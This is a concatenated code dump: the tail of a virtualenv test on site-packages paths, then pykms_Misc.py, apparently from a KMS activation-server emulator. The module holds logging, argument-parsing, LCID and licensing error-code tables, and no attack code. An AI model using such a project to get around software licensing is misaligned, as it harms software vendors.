[str(session.creator.exe), "-c", r"import site; print(site.getsitepackages())"],
universal_newlines=True,
)
site_packages = ast.literal_eval(out)
for system_site_package in system_site_packages:
assert system_site_package not in site_packages
# Test with --system-site-packages
session = cli_run([ensure_text(str(tmp_path)), "--system-site-packages"])
system_site_packages = get_expected_system_site_packages(session)
out = subprocess.check_output(
[str(session.creator.exe), "-c", r"import site; print(site.getsitepackages())"],
universal_newlines=True,
)
site_packages = ast.literal_eval(out)
for system_site_package in system_site_packages:
assert system_site_package in site_packages
def get_expected_system_site_packages(session):
base_prefix = session.creator.pyenv_cfg["base-prefix"]
base_exec_prefix = session.creator.pyenv_cfg["base-exec-prefix"]
old_prefixes = site.PREFIXES
site.PREFIXES = [base_prefix, base_exec_prefix]
system_site_packages = site.getsitepackages()
site.PREFIXES = old_prefixes
return system_site_packages
def test_get_site_packages(tmp_path):
case_sensitive = fs_is_case_sensitive()
session = cli_run([ensure_text(str(tmp_path))])
env_site_packages = [str(session.creator.purelib), str(session.creator.platlib)]
out = subprocess.check_output(
[str(session.creator.exe), "-c", r"import site; print(site.getsitepackages())"],
universal_newlines=True,
)
site_packages = ast.literal_eval(out)
if not case_sensitive:
env_site_packages = [x.lower() for x in env_site_packages]
site_packages = [x.lower() for x in site_packages]
for env_site_package in env_site_packages:
assert env_site_package in site_packages
|
pykms_Misc.py | #!/usr/bin/env python3
import sys
import logging
import os
import argparse
from logging.handlers import RotatingFileHandler
from pykms_Format import ColorExtraMap, ShellMessage, pretty_printer
#------------------------------------------------------------------------------------------------------------------------------------------------------------
# https://stackoverflow.com/questions/2183233/how-to-add-a-custom-loglevel-to-pythons-logging-facility
# https://stackoverflow.com/questions/17558552/how-do-i-add-custom-field-to-python-log-format-string
# https://stackoverflow.com/questions/1343227/can-pythons-logging-format-be-modified-depending-on-the-message-log-level
# https://stackoverflow.com/questions/14844970/modifying-logging-message-format-based-on-message-logging-level-in-python3
def add_logging_level(levelName, levelNum, methodName = None):
""" Adds a new logging level to the `logging` module and the currently configured logging class.
`levelName` becomes an attribute of the `logging` module with the value `levelNum`.
`methodName` becomes a convenience method for both `logging` itself and the class returned by `logging.getLoggerClass()`
(usually just `logging.Logger`). If `methodName` is not specified, `levelName.lower()` is used.
To avoid accidental clobberings of existing attributes, this method will raise an `AttributeError` if the level name
is already an attribute of the `logging` module or if the method name is already present .
Example
-------
>>> add_logging_level('TRACE', logging.DEBUG - 5)
>>> logging.getLogger(__name__).setLevel("TRACE")
>>> logging.getLogger(__name__).trace('that worked')
>>> logging.trace('so did this')
>>> logging.TRACE
5
"""
if not methodName:
methodName = levelName.lower()
if hasattr(logging, levelName) or hasattr(logging, methodName) or hasattr(logging.getLoggerClass(), methodName):
return
def logForLevel(self, message, *args, **kwargs):
if self.isEnabledFor(levelNum):
self._log(levelNum, message, args, **kwargs)
def logToRoot(message, *args, **kwargs):
logging.log(levelNum, message, *args, **kwargs)
logging.addLevelName(levelNum, levelName)
setattr(logging, levelName, levelNum)
setattr(logging.getLoggerClass(), methodName, logForLevel)
setattr(logging, methodName, logToRoot)
class LevelFormatter(logging.Formatter):
dfmt = '%a, %d %b %Y %H:%M:%S'
default_fmt = logging.Formatter('%(message)s', datefmt = dfmt)
def __init__(self, formats, color = False):
""" `formats` is a dict { loglevel : logformat } """
self.formatters = {}
for loglevel in formats:
if color:
frmt = self.colorize(formats, loglevel)
formats[loglevel] = frmt.format(**ColorExtraMap)
self.formatters[loglevel] = logging.Formatter(formats[loglevel], datefmt = self.dfmt)
def colorize(self, formats, loglevel):
if loglevel == logging.MINI:
frmt = '{gray}' + formats[loglevel] + '{end}'
elif loglevel == logging.CRITICAL:
frmt = '{magenta}{bold}' + formats[loglevel] + '{end}'
elif loglevel == logging.ERROR:
frmt = '{red}{bold}' + formats[loglevel] + '{end}'
elif loglevel == logging.WARNING:
frmt = '{yellow}{bold}' + formats[loglevel] + '{end}'
elif loglevel == logging.INFO:
frmt = '{cyan}' + formats[loglevel] + '{end}'
elif loglevel == logging.DEBUG:
frmt = '{green}' + formats[loglevel] + '{end}'
else:
frmt = '{end}' + formats[loglevel] + '{end}'
return frmt
def format(self, record):
formatter = self.formatters.get(record.levelno, self.default_fmt)
return formatter.format(record)
# based on https://github.com/jruere/multiprocessing-logging (license LGPL-3.0)
from multiprocessing import Queue as MPQueue
import queue as Queue
import threading
class MultiProcessingLogHandler(logging.Handler):
def __init__(self, name, handler = None):
super(MultiProcessingLogHandler, self).__init__()
self.queue = MPQueue(-1)
if handler is None:
handler = logging.StreamHandler()
self.handler = handler
self.name = handler.name
self.setLevel(self.handler.level)
self.setFormatter(self.handler.formatter)
self.filters = self.handler.filters
self.is_closed = False
self.receive_thread = threading.Thread(target = self.receive, name = name)
self.receive_thread.daemon = True
self.receive_thread.start()
def setFormatter(self, fmt):
super(MultiProcessingLogHandler, self).setFormatter(fmt)
self.handler.setFormatter(fmt)
def emit(self, record):
try:
if record.args:
record.msg = record.msg %record.args
record.args = None
if record.exc_info:
dummy = self.format(record)
record.exc_info = None
self.queue.put_nowait(record)
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
def receive(self):
while not (self.is_closed and self.queue.empty()):
try:
record = self.queue.get(timeout = 0.2)
self.handler.emit(record)
except (KeyboardInterrupt, SystemExit):
raise
except EOFError:
break
except Queue.Empty:
pass
except:
logging.exception('Error in log handler.')
self.queue.close()
self.queue.join_thread()
def close(self):
if not self.is_closed:
self.is_closed = True
self.receive_thread.join(5.0)
self.handler.close()
super(MultiProcessingLogHandler, self).close()
def logger_create(log_obj, config, mode = 'a'):
# Create new level.
add_logging_level('MINI', logging.CRITICAL + 10)
log_handlers = []
# Configure visualization.
if any(opt in ['STDOUT', 'FILESTDOUT', 'STDOUTOFF'] for opt in config['logfile']):
if any(opt in ['STDOUT', 'FILESTDOUT'] for opt in config['logfile']):
# STDOUT or FILESTDOUT.
hand_stdout = logging.StreamHandler(sys.stdout)
hand_stdout.name = 'LogStdout'
log_handlers.append(hand_stdout)
if any(opt in ['STDOUTOFF', 'FILESTDOUT'] for opt in config['logfile']):
# STDOUTOFF or FILESTDOUT.
hand_rotate = RotatingFileHandler(filename = config['logfile'][1], mode = mode, maxBytes = int(config['logsize'] * 1024 * 512),
backupCount = 1, encoding = None, delay = 0)
hand_rotate.name = 'LogRotate'
log_handlers.append(hand_rotate)
elif 'FILEOFF' in config['logfile']:
hand_null = logging.FileHandler(os.devnull)
hand_null.name = 'LogNull'
log_handlers.append(hand_null)
else:
# FILE.
hand_rotate = RotatingFileHandler(filename = config['logfile'][0], mode = mode, maxBytes = int(config['logsize'] * 1024 * 512),
backupCount = 1, encoding = None, delay = 0)
hand_rotate.name = 'LogRotate'
log_handlers.append(hand_rotate)
# Configure formattation.
try:
levelnames = logging._levelToName
except AttributeError:
levelnames = logging._levelNames
levelnum = [k for k in levelnames if k != 0]
frmt_gen = '%(asctime)s %(levelname)-8s %(message)s'
frmt_std = '%(name)s %(asctime)s %(levelname)-8s %(message)s'
frmt_min = '[%(asctime)s] [%(levelname)-8s] %(host)s %(status)s %(product)s %(message)s'
def apply_formatter(levelnum, formats, handler, color = False):
levelformdict = {}
for num in levelnum:
if num != logging.CRITICAL + 10:
levelformdict[num] = formats[0]
else:
levelformdict[num] = formats[1]
handler.setFormatter(LevelFormatter(levelformdict, color = color))
return handler
# Clear old handlers.
if log_obj.handlers:
log_obj.handlers = []
for log_handler in log_handlers:
log_handler.setLevel(config['loglevel'])
if log_handler.name in ['LogStdout']:
log_handler = apply_formatter(levelnum, (frmt_std, frmt_min), log_handler, color = True)
elif log_handler.name in ['LogRotate']:
log_handler = apply_formatter(levelnum, (frmt_gen, frmt_min), log_handler)
# Attach.
if config['asyncmsg']:
log_obj.addHandler(MultiProcessingLogHandler('Thread-AsyncMsg{0}'.format(log_handler.name), handler = log_handler))
else:
log_obj.addHandler(log_handler)
log_obj.setLevel(config['loglevel'])
#------------------------------------------------------------------------------------------------------------------------------------------------------------
def check_logfile(optionlog, defaultlog, where):
if not isinstance(optionlog, list):
optionlog = [optionlog]
lenopt = len(optionlog)
msg_dir = "{reverse}{red}{bold}argument `-F/--logfile`: invalid directory: '%s'. Exiting...{end}"
msg_long = "{reverse}{red}{bold}argument `-F/--logfile`: too much arguments. Exiting...{end}"
msg_log = "{reverse}{red}{bold}argument `-F/--logfile`: not a log file, invalid extension: '%s'. Exiting...{end}"
def checkdir(path):
filename = os.path.basename(path)
pathname = os.path.dirname(path)
if not os.path.isdir(pathname):
if path.count('/') == 0:
pathname = filename
pretty_printer(put_text = msg_dir %pathname, where = where, to_exit = True)
elif not filename.lower().endswith('.log'):
pretty_printer(put_text = msg_log %filename, where = where, to_exit = True)
if lenopt > 2:
pretty_printer(put_text = msg_long, where = where, to_exit = True)
if (any(opt in ['FILESTDOUT', 'STDOUTOFF'] for opt in optionlog)):
if lenopt == 1:
# add default logfile.
optionlog.append(defaultlog)
elif lenopt == 2:
# check directory path.
checkdir(optionlog[1])
else:
if lenopt == 2:
pretty_printer(put_text = msg_long, where = where, to_exit = True)
elif lenopt == 1 and (any(opt not in ['STDOUT', 'FILEOFF'] for opt in optionlog)):
# check directory path.
checkdir(optionlog[0])
return optionlog
#------------------------------------------------------------------------------------------------------------------------------------------------------------
# Valid language identifiers to be used in the EPID (see "kms.c" in vlmcsd)
ValidLcid = [1025, 1026, 1027, 1028, 1029,
1030, 1031, 1032, 1033, 1034, 1035, 1036, 1037, 1038, 1039,
1040, 1041, 1042, 1043, 1044, 1045, 1046, 1048, 1049,
1050, 1051, 1052, 1053, 1054, 1056, 1057, 1058, 1059,
1060, 1061, 1062, 1063, 1065, 1066, 1067, 1068, 1069,
1071, 1074, 1076, 1077, 1078, 1079,
1080, 1081, 1082, 1083, 1086, 1087, 1088, 1089,
1091, 1092, 1093, 1094, 1095, 1097, 1098, 1099,
1100, 1102, 1103, 1104, 1106, 1110, 1111, 1114, 1125, 1131, 1153,
2049, 2052, 2055, 2057, 2058, 2060, 2064, 2067, 2068, 2070, 2074, 2077, 2092, 2107, 2110, 2115, 2155,
3073, 3076, 3079, 3081, 3082, 3084, 3098, 3131, 3179,
4097, 4100, 4103, 4105, 4106, 4108, 4122, 4155,
5121, 5124, 5127, 5129, 5130, 5132, 5146, 5179,
6145, 6153, 6154, 6156, 6170, 6203,
7169, 7177, 7178, 7194, 7227,
8193, 8201, 8202, 8251,
9217, 9225, 9226, 9275,
10241, 10249, 10250, 11265, 11273, 11274, 12289, 12297, 12298,
13313, 13321, 13322, 14337, 14346, 15361, 15370, 16385, 16394, 17418, 18442, 19466, 20490]
# http://stackoverflow.com/questions/3425294/how-to-detect-the-os-default-language-in-python
def check_lcid(lcid, log_obj):
if not lcid or (lcid not in ValidLcid):
if hasattr(sys, 'implementation') and sys.implementation.name == 'cpython':
fixlcid = 1033
elif os.name == 'nt':
import ctypes
fixlcid = ctypes.windll.kernel32.GetUserDefaultUILanguage()
else:
import locale
try:
fixlcid = next(k for k, v in locale.windows_locale.items() if v == locale.getdefaultlocale()[0])
except StopIteration:
fixlcid = 1033
pretty_printer(log_obj = log_obj, put_text = "{reverse}{yellow}{bold}LCID '%s' auto-fixed with LCID '%s'{end}" %(lcid, fixlcid))
return fixlcid
return lcid
#------------------------------------------------------------------------------------------------------------------------------------------------------------
class KmsParserException(Exception):
pass
class KmsParser(argparse.ArgumentParser):
def error(self, message):
raise KmsParserException(message)
class KmsParserHelp(object):
def replace(self, parser, replace_epilog_with):
text = parser.format_help().splitlines()
help_list = []
for line in text:
if line == parser.description:
continue
if line == parser.epilog:
line = replace_epilog_with
help_list.append(line)
return help_list
def printer(self, parsers):
if len(parsers) == 3:
parser_base, parser_adj, parser_sub = parsers
replace_epilog_with = 80 * '*' + '\n'
elif len(parsers) == 1:
parser_base = parsers[0]
replace_epilog_with = ''
print('\n' + parser_base.description)
print(len(parser_base.description) * '-' + '\n')
for line in self.replace(parser_base, replace_epilog_with):
print(line)
try:
print(parser_adj.description + '\n')
for line in self.replace(parser_sub, replace_epilog_with):
print(line)
except:
pass
print('\n' + len(parser_base.epilog) * '-')
print(parser_base.epilog + '\n')
parser_base.exit()
def kms_parser_get(parser):
zeroarg, onearg = ([] for _ in range(2))
act = vars(parser)['_actions']
for i in range(len(act)):
if act[i].option_strings not in ([], ['-h', '--help']):
if isinstance(act[i], argparse._StoreAction):
onearg.append(act[i].option_strings)
else:
zeroarg.append(act[i].option_strings)
return zeroarg, onearg
def kms_parser_check_optionals(userarg, zeroarg, onearg, msg = 'optional py-kms server', exclude_opt_len = []):
"""
For optionals arguments:
Don't allow duplicates,
Don't allow abbreviations,
Don't allow joining and not existing arguments,
Checks length values passed to arguments.
"""
zeroarg = [item for sublist in zeroarg for item in sublist]
onearg = [item for sublist in onearg for item in sublist]
allarg = zeroarg + onearg
def is_abbrev(allarg, arg_to_check):
for opt in allarg:
if len(opt) > 2 and opt[2] == arg_to_check[2]:
for indx in range(-1, -len(opt), -1):
if opt[:indx] == arg_to_check:
raise KmsParserException("%s argument `%s` abbreviation not allowed for `%s`" %(msg, arg_to_check, opt))
return False
# Check abbreviations, joining, not existing.
for arg in userarg:
if arg not in allarg:
if arg.startswith('-'):
if arg == '--' or arg[:2] != '--' or not is_abbrev(allarg, arg):
raise KmsParserException("unrecognized %s arguments: `%s`" %(msg, arg))
# Check duplicates.
founds = [i for i in userarg if i in allarg]
dup = [item for item in set(founds) if founds.count(item) > 1]
if dup != []:
raise KmsParserException("%s argument `%s` appears several times" %(msg, ', '.join(dup)))
# Check length.
elem = None
for found in founds:
if found not in exclude_opt_len:
pos = userarg.index(found)
try:
if found in zeroarg:
elem = userarg[pos + 1]
num = "zero arguments,"
elif found in onearg:
elem = userarg[pos + 2]
num = "one argument,"
except IndexError:
pass
if elem and elem not in allarg:
raise KmsParserException("%s argument `" %msg + found + "`:" + " expected " + num + " unrecognized: '%s'" %elem)
def kms_parser_check_positionals(config, parse_method, arguments = [], force_parse = False, msg = 'positional py-kms server'):
try:
if arguments or force_parse:
config.update(vars(parse_method(arguments)))
else:
config.update(vars(parse_method()))
except KmsParserException as e:
e = str(e)
if e.startswith('argument'):
raise
else:
raise KmsParserException("unrecognized %s arguments: '%s'" %(msg, e.split(': ')[1]))
#------------------------------------------------------------------------------------------------------------------------------------------------------------
def proper_none(dictionary):
for key in dictionary.keys():
dictionary[key] = None if dictionary[key] == 'None' else dictionary[key]
def check_setup(config, options, logger, where):
# 'None'--> None.
proper_none(config)
# Check logfile.
config['logfile'] = check_logfile(config['logfile'], options['lfile']['def'], where = where)
# Check logsize (py-kms Gui).
if config['logsize'] == "":
if any(opt in ['STDOUT', 'FILEOFF'] for opt in config['logfile']):
# set a recognized size never used.
config['logsize'] = 0
else:
pretty_printer(put_text = "{reverse}{red}{bold}argument `-S/--logsize`: invalid with: '%s'. Exiting...{end}" %config['logsize'],
where = where, to_exit = True)
# Check loglevel (py-kms Gui).
if config['loglevel'] == "":
# set a recognized level never used.
config['loglevel'] = 'ERROR'
# Setup hidden / asynchronous messages.
hidden = ['STDOUT', 'FILESTDOUT', 'STDOUTOFF']
view_flag = (False if any(opt in hidden for opt in config['logfile']) else True)
if where == 'srv':
ShellMessage.viewsrv = view_flag
ShellMessage.asyncmsgsrv = config['asyncmsg']
elif where == 'clt':
ShellMessage.viewclt = view_flag
ShellMessage.asyncmsgclt = config['asyncmsg']
# Create log.
logger_create(logger, config, mode = 'a')
# Check port.
if (config['port'] == "") or (not 1 <= config['port'] <= 65535):
pretty_printer(log_obj = logger.error, where = where, to_exit = True,
put_text = "{reverse}{red}{bold}Port number '%s' is invalid. Enter between 1 - 65535. Exiting...{end}" %config['port'])
#------------------------------------------------------------------------------------------------------------------------------------------------------------
# http://joshpoley.blogspot.com/2011/09/hresults-user-0x004.html (slerror.h)
ErrorCodes = {
'SL_E_SRV_INVALID_PUBLISH_LICENSE' : (0xC004B001, 'The activation server determined that the license is invalid.'),
'SL_E_SRV_INVALID_PRODUCT_KEY_LICENSE' : (0xC004B002, 'The activation server determined that the license is invalid.'),
'SL_E_SRV_INVALID_RIGHTS_ACCOUNT_LICENSE' : (0xC004B003, 'The activation server determined that the license is invalid.'),
'SL_E_SRV_INVALID_LICENSE_STRUCTURE' : (0xC004B004, 'The activation server determined that the license is invalid.'),
'SL_E_SRV_AUTHORIZATION_FAILED' : (0xC004B005, 'The activation server determined that the license is invalid.'),
'SL_E_SRV_INVALID_BINDING' : (0xC004B006, 'The activation server determined that the license is invalid.'),
'SL_E_SRV_SERVER_PONG' : (0xC004B007, 'The activation server reported that the computer could not connect to the activation server.'),
'SL_E_SRV_INVALID_PAYLOAD' : (0xC004B008, 'The activation server determined that the product could not be activated.'),
'SL_E_SRV_INVALID_SECURITY_PROCESSOR_LICENSE' : (0xC004B009, 'The activation server determined that the license is invalid.'),
'SL_E_SRV_BUSINESS_TOKEN_ENTRY_NOT_FOUND' : (0xC004B010, 'The activation server determined that required business token entry cannot be found.'),
'SL_E_SRV_CLIENT_CLOCK_OUT_OF_SYNC' : (0xC004B011, 'The activation server determined that your computer clock time is not correct. You must correct your clock before you can activate.'),
'SL_E_SRV_GENERAL_ERROR' : (0xC004B100, 'The activation server determined that the product could not be activated.'),
'SL_E_CHPA_PRODUCT_KEY_OUT_OF_RANGE' : (0xC004C001, 'The activation server determined the specified product key is invalid.'),
'SL_E_CHPA_INVALID_BINDING' : (0xC004C002, 'The activation server determined there is a problem with the specified product key.'),
'SL_E_CHPA_PRODUCT_KEY_BLOCKED' : (0xC004C003, 'The activation server determined the specified product key has been blocked.'),
'SL_E_CHPA_INVALID_PRODUCT_KEY' : (0xC004C004, 'The activation server determined the specified product key is invalid.'),
'SL_E_CHPA_BINDING_NOT_FOUND' : (0xC004C005, 'The activation server determined the license is invalid.'),
'SL_E_CHPA_BINDING_MAPPING_NOT_FOUND' : (0xC004C006, 'The activation server determined the license is invalid.'),
'SL_E_CHPA_UNSUPPORTED_PRODUCT_KEY' : (0xC004C007, 'The activation server determined the specified product key is invalid.'),
'SL_E_CHPA_MAXIMUM_UNLOCK_EXCEEDED' : (0xC004C008, 'The activation server reported that the product key has exceeded its unlock limit.'),
'SL_E_CHPA_ACTCONFIG_ID_NOT_FOUND' : (0xC004C009, 'The activation server determined the license is invalid.'),
'SL_E_CHPA_INVALID_PRODUCT_DATA_ID' : (0xC004C00A, 'The activation server determined the license is invalid.'),
'SL_E_CHPA_INVALID_PRODUCT_DATA' : (0xC004C00B, 'The activation server determined the license is invalid.'),
'SL_E_CHPA_SYSTEM_ERROR' : (0xC004C00C, 'The activation server experienced an error.'),
'SL_E_CHPA_INVALID_ACTCONFIG_ID' : (0xC004C00D, 'The activation server determined the product key is not valid.'),
'SL_E_CHPA_INVALID_PRODUCT_KEY_LENGTH' : (0xC004C00E, 'The activation server determined the specified product key is invalid.'),
'SL_E_CHPA_INVALID_PRODUCT_KEY_FORMAT' : (0xC004C00F, 'The activation server determined the specified product key is invalid.'),
'SL_E_CHPA_INVALID_PRODUCT_KEY_CHAR' : (0xC004C010, 'The activation server determined the specified product key is invalid.'),
'SL_E_CHPA_INVALID_BINDING_URI' : (0xC004C011, 'The activation server determined the license is invalid.'),
'SL_E_CHPA_NETWORK_ERROR' : (0xC004C012, 'The activation server experienced a network error.'),
'SL_E_CHPA_DATABASE_ERROR' : (0xC004C013, 'The activation server experienced an error.'),
'SL_E_CHPA_INVALID_ARGUMENT' : (0xC004C014, 'The activation server experienced an error.'),
'SL_E_CHPA_RESPONSE_NOT_AVAILABLE' : (0xC004C015, 'The activation server experienced an error.'),
'SL_E_CHPA_OEM_SLP_COA0' : (0xC004C016, 'The activation server reported that the specified product key cannot be used for online activation.'),
'SL_E_CHPA_PRODUCT_KEY_BLOCKED_IPLOCATION' : (0xC004C017, 'The activation server determined the specified product key has been blocked for this geographic location.'),
'SL_E_CHPA_DMAK_LIMIT_EXCEEDED' : (0xC004C020, 'The activation server reported that the Multiple Activation Key has exceeded its limit.'),
'SL_E_CHPA_DMAK_EXTENSION_LIMIT_EXCEEDED' : (0xC004C021, 'The activation server reported that the Multiple Activation Key extension limit has been exceeded.'),
'SL_E_CHPA_REISSUANCE_LIMIT_NOT_FOUND' : (0xC004C022, 'The activation server reported that the re-issuance limit was not found.'),
'SL_E_CHPA_OVERRIDE_REQUEST_NOT_FOUND' : (0xC004C023, 'The activation server reported that the override request was not found.'),
'SL_E_CHPA_TIMEBASED_ACTIVATION_BEFORE_START_DATE' : (0xC004C030, 'The activation server reported that time based activation attempted before start date.'),
'SL_E_CHPA_TIMEBASED_ACTIVATION_AFTER_END_DATE' : (0xC004C031, 'The activation server reported that time based activation attempted after end date.'),
'SL_E_CHPA_TIMEBASED_ACTIVATION_NOT_AVAILABLE' : (0xC004C032, 'The activation server reported that new time based activation is not available.'),
'SL_E_CHPA_TIMEBASED_PRODUCT_KEY_NOT_CONFIGURED' : (0xC004C033, 'The activation server reported that the time based product key is not configured for activation.'),
'SL_E_CHPA_NO_RULES_TO_ACTIVATE' : (0xC004C04F, 'The activation server reported that no business rules available to activate specified product key.'),
'SL_E_CHPA_GENERAL_ERROR' : (0xC004C050, 'The activation server experienced a general error.'),
'SL_E_CHPA_DIGITALMARKER_INVALID_BINDING' : (0xC004C051, 'The activation server determined the license is invalid.'),
'SL_E_CHPA_DIGITALMARKER_BINDING_NOT_CONFIGURED' : (0xC004C052, 'The activation server determined there is a problem with the specified product key.'),
'SL_E_CHPA_DYNAMICALLY_BLOCKED_PRODUCT_KEY' : (0xC004C060, 'The activation server determined the specified product key has been blocked.'),
'SL_E_INVALID_LICENSE_STATE_BREACH_GRACE' : (0xC004C291, 'Genuine Validation determined the license state is invalid.'),
'SL_E_INVALID_LICENSE_STATE_BREACH_GRACE_EXPIRED' : (0xC004C292, 'Genuine Validation determined the license state is invalid.'),
'SL_E_INVALID_TEMPLATE_ID' : (0xC004C2F6, 'Genuine Validation determined the validation input template identifier is invalid.'),
'SL_E_INVALID_XML_BLOB' : (0xC004C2FA, 'Genuine Validation determined the validation input data blob is invalid.'),
'SL_E_VALIDATION_BLOB_PARAM_NOT_FOUND' : (0xC004C327, 'Genuine Validation determined the validation input data blob parameter is invalid.'),
'SL_E_INVALID_CLIENT_TOKEN' : (0xC004C328, 'Genuine Validation determined the client token data is invalid.'),
'SL_E_INVALID_OFFLINE_BLOB' : (0xC004C329, 'Genuine Validation determined the offline data blob is invalid.'),
'SL_E_OFFLINE_VALIDATION_BLOB_PARAM_NOT_FOUND' : (0xC004C32A, 'Genuine Validation determined the offline data blob parameter is invalid.'),
'SL_E_INVALID_OSVERSION_TEMPLATEID' : (0xC004C32B, 'Genuine Validation determined the validation template identifier is invalid for this version of the Windows operating system.'),
'SL_E_OFFLINE_GENUINE_BLOB_REVOKED' : (0xC004C32C, 'Genuine Validation determined the offline genuine blob is revoked.'),
'SL_E_OFFLINE_GENUINE_BLOB_NOT_FOUND' : (0xC004C32D, 'Genuine Validation determined the offline genuine blob is not found.'),
'SL_E_CHPA_MSCH_RESPONSE_NOT_AVAILABLE_VGA' : (0xC004C3FF, 'The activation server determined the VGA service response is not available in the expected format.'),
'SL_E_INVALID_OS_FOR_PRODUCT_KEY' : (0xC004C401, 'Genuine Validation determined the product key is invalid for this version of the Windows operating system.'),
'SL_E_INVALID_FILE_HASH' : (0xC004C4A1, 'Genuine Validation determined the file hash is invalid.'),
'SL_E_VALIDATION_BLOCKED_PRODUCT_KEY' : (0xC004C4A2, 'Genuine Validation determined the product key has been blocked.'),
'SL_E_MISMATCHED_KEY_TYPES' : (0xC004C4A4, 'Genuine Validation determined the product key type is invalid.'),
'SL_E_VALIDATION_INVALID_PRODUCT_KEY' : (0xC004C4A5, 'Genuine Validation determined the product key is invalid.'),
'SL_E_INVALID_OEM_OR_VOLUME_BINDING_DATA' : (0xC004C4A7, 'Genuine Validation determined the OEM or Volume binding data is invalid.'),
'SL_E_INVALID_LICENSE_STATE' : (0xC004C4A8, 'Genuine Validation determined the license state is invalid.'),
'SL_E_IP_LOCATION_FALIED' : (0xC004C4A9, 'Genuine Validation determined the specified product key has been blocked for this geographic location.'),
'SL_E_SOFTMOD_EXPLOIT_DETECTED' : (0xC004C4AB, 'Genuine Validation detected Windows licensing exploits.'),
'SL_E_INVALID_TOKEN_DATA' : (0xC004C4AC, 'Genuine Validation determined the token activation data is invalid.'),
'SL_E_HEALTH_CHECK_FAILED_NEUTRAL_FILES' : (0xC004C4AD, 'Genuine Validation detected tampered Windows binaries.'),
'SL_E_HEALTH_CHECK_FAILED_MUI_FILES' : (0xC004C4AE, 'Genuine Validation detected tampered Windows binaries.'),
'SL_E_INVALID_AD_DATA' : (0xC004C4AF, 'Genuine Validation determined the active directory activation data is invalid.'),
'SL_E_INVALID_RSDP_COUNT' : (0xC004C4B0, 'Genuine Validation detected Windows licensing exploits.'),
'SL_E_ENGINE_DETECTED_EXPLOIT' : (0xC004C4B1, 'Genuine Validation detected Windows licensing exploits.'),
'SL_E_NOTIFICATION_BREACH_DETECTED' : (0xC004C531, 'Genuine Validation detected Windows licensing exploits.'),
'SL_E_NOTIFICATION_GRACE_EXPIRED' : (0xC004C532, 'Genuine Validation determined the license state is in notification due to expired grace.'),
'SL_E_NOTIFICATION_OTHER_REASONS' : (0xC004C533, 'Genuine Validation determined the license state is in notification.'),
'SL_E_NON_GENUINE_STATUS_LAST' : (0xC004C600, 'Genuine Validation determined your copy of Windows is not genuine.'),
'SL_E_CHPA_BUSINESS_RULE_INPUT_NOT_FOUND' : (0xC004C700, 'The activation server reported that business rule cound not find required input.'),
'SL_E_CHPA_NULL_VALUE_FOR_PROPERTY_NAME_OR_ID' : (0xC004C750, 'The activation server reported that NULL value specified for business property name and Id.'),
'SL_E_CHPA_UNKNOWN_PROPERTY_NAME' : (0xC004C751, 'The activation server reported that property name specifies unknown property.'),
'SL_E_CHPA_UNKNOWN_PROPERTY_ID' : (0xC004C752, 'The activation server reported that property Id specifies unknown property.'),
'SL_E_CHPA_FAILED_TO_UPDATE_PRODUCTKEY_BINDING' : (0xC004C755, 'The activation server reported that it failed to update product key binding.'),
'SL_E_CHPA_FAILED_TO_INSERT_PRODUCTKEY_BINDING' : (0xC004C756, 'The activation server reported that it failed to insert product key binding.'),
'SL_E_CHPA_FAILED_TO_DELETE_PRODUCTKEY_BINDING' : (0xC004C757, 'The activation server reported that it failed to delete product key binding.'),
'SL_E_CHPA_FAILED_TO_PROCESS_PRODUCT_KEY_BINDINGS_XML' : (0xC004C758, 'The activation server reported that it failed to process input XML for product key bindings.'),
'SL_E_CHPA_FAILED_TO_INSERT_PRODUCT_KEY_PROPERTY' : (0xC004C75A, 'The activation server reported that it failed to insert product key property.'),
'SL_E_CHPA_FAILED_TO_UPDATE_PRODUCT_KEY_PROPERTY' : (0xC004C75B, 'The activation server reported that it failed to update product key property.'),
'SL_E_CHPA_FAILED_TO_DELETE_PRODUCT_KEY_PROPERTY' : (0xC004C75C, 'The activation server reported that it failed to delete product key property.'),
'SL_E_CHPA_UNKNOWN_PRODUCT_KEY_TYPE' : (0xC004C764, 'The activation server reported that the product key type is unknown.'),
'SL_E_CHPA_PRODUCT_KEY_BEING_USED' : (0xC004C770, 'The activation server reported that the product key type is being used by another user.'),
'SL_E_CHPA_FAILED_TO_INSERT_PRODUCT_KEY_RECORD' : (0xC004C780, 'The activation server reported that it failed to insert product key record.'),
'SL_E_CHPA_FAILED_TO_UPDATE_PRODUCT_KEY_RECORD' : (0xC004C781, 'The activation server reported that it failed to update product key record.'),
'SL_REMAPPING_SP_PUB_API_INVALID_LICENSE' : (0xC004D000, ''),
'SL_REMAPPING_SP_PUB_API_INVALID_ALGORITHM_TYPE' : (0xC004D009, ''),
'SL_REMAPPING_SP_PUB_API_TOO_MANY_LOADED_ENVIRONMENTS' : (0xC004D00C, ''),
'SL_REMAPPING_SP_PUB_API_BAD_GET_INFO_QUERY' : (0xC004D012, ''),
'SL_REMAPPING_SP_PUB_API_INVALID_KEY_LENGTH' : (0xC004D055, ''),
'SL_REMAPPING_SP_PUB_API_NO_AES_PROVIDER' : (0xC004D073, ''),
'SL_REMAPPING_SP_PUB_API_HANDLE_NOT_COMMITED' : (0xC004D081, 'The handle was used before calling SPCommit with it.'),
'SL_REMAPPING_SP_PUB_GENERAL_NOT_INITIALIZED' : (0xC004D101, 'The security processor reported an initialization error.'),
'SL_REMAPPING_SP_STATUS_SYSTEM_TIME_SKEWED' : (0x8004D102, 'The security processor reported that the machine time is inconsistent with the trusted time.'),
'SL_REMAPPING_SP_STATUS_GENERIC_FAILURE' : (0xC004D103, 'The security processor reported that an error has occurred.'),
'SL_REMAPPING_SP_STATUS_INVALIDARG' : (0xC004D104, 'The security processor reported that invalid data was used.'),
'SL_REMAPPING_SP_STATUS_ALREADY_EXISTS' : (0xC004D105, 'The security processor reported that the value already exists.'),
'SL_REMAPPING_SP_STATUS_INSUFFICIENT_BUFFER' : (0xC004D107, 'The security processor reported that an insufficient buffer was used.'),
'SL_REMAPPING_SP_STATUS_INVALIDDATA' : (0xC004D108, 'The security processor reported that invalid data was used.'),
'SL_REMAPPING_SP_STATUS_INVALID_SPAPI_CALL' : (0xC004D109, 'The security processor reported that an invalid call was made.'),
'SL_REMAPPING_SP_STATUS_INVALID_SPAPI_VERSION' : (0xC004D10A, 'The security processor reported a version mismatch error.'),
'SL_REMAPPING_SP_STATUS_DEBUGGER_DETECTED' : (0x8004D10B, 'The security processor cannot operate while a debugger is attached.'),
'SL_REMAPPING_SP_STATUS_NO_MORE_DATA' : (0xC004D10C, 'No more data is available.'),
